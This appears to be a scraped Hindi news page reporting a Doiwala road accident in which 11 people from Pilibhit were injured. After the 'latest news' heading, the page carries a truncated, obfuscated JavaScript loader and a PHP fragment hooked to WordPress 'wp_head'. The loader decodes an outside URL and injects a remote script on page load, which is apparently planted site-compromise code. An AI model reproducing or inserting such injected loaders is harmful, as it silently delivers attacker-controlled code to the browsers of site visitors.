Saturday, July 27, 2024
spot_img

उत्तराखंड: डोईवाला में खड़े ट्रक से टकराई कार! दीपावली की छुट्टी मनाकर लौट रहे यूपी के 10 लोगों समेत 11 घायल

देहरादून जिले में सड़क हादसे में उत्तर प्रदेश के 10 लोग और ड्राइवर समेत 11 लोग घायल हुए हैं। सुबह 6 बजे के करीब हुई इस दुर्घटना के घायलों को आनन फानन में एम्स ऋषिकेश भेजा गया। उत्तर प्रदेश निवासी ये लोग अपने घर से दीवाली की छुट्टियां बिताकर अपने काम पर वापस लौट रहे थे. डोईवाला में कार चालक को झपकी आ गई। इसी दौरान ये बड़ा हादसा हो गया। कार का चालक ज्यादा गंभीर घायल है। उसे हिमालयन हॉस्पिटल जौलीग्रांट में भर्ती कराया गया।

जानकारी के अनुसार शनिवार सुबह ये हादसा हुआ है। दीपावली की छुट्टी मनाकर उत्तर प्रदेश के पीलीभीत के रहने वाले सभी लोग बच्चों के साथ वापस देहरादून लौट रहे थे। जब कार डोईवाला के हरिद्वार रोड जीवनवाला के पास पहुंची तो कार की टक्कर पहले से खड़े ट्रक से हो गई। टक्कर लगने के बाद मौके पर चीख पुकार मच गई। मौके पर पहुंचे सभासद बलविंदर सिंह ने इसकी सूचना पुलिस और 108 को दी। एसडीआरएफ को भी तत्काल हादसे की सूचना दी गई। मौके पर पहुंची पुलिस ने सभी घायलों को 108 की मदद से अस्पताल भिजवाया। बताया जा रहा है कि सभी घायल उत्तर प्रदेश के पीलीभीत के रहने वाले हैं। यह सभी लोग देहरादून के सेलाकुई में एक कंपनी में कार्य करते हैं। दीवाली की छुट्टी पर सभी लोग अपने घर गए थे। दीपावली की छुट्टी मनाने के बाद आज सुबह घर से वापस लौट रहे थे। कार में तीन बच्चों समेत 10 लोग सवार थे। इनमें से सात वयस्क और तीन बच्चे घायल हुए हैं। मौके पर पहुंची पुलिस और एसडीआरएफ की टीम ने गाड़ी में फंसे लोगों को बाहर निकाला और 108 की मदद से अस्पताल भिजवाया।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>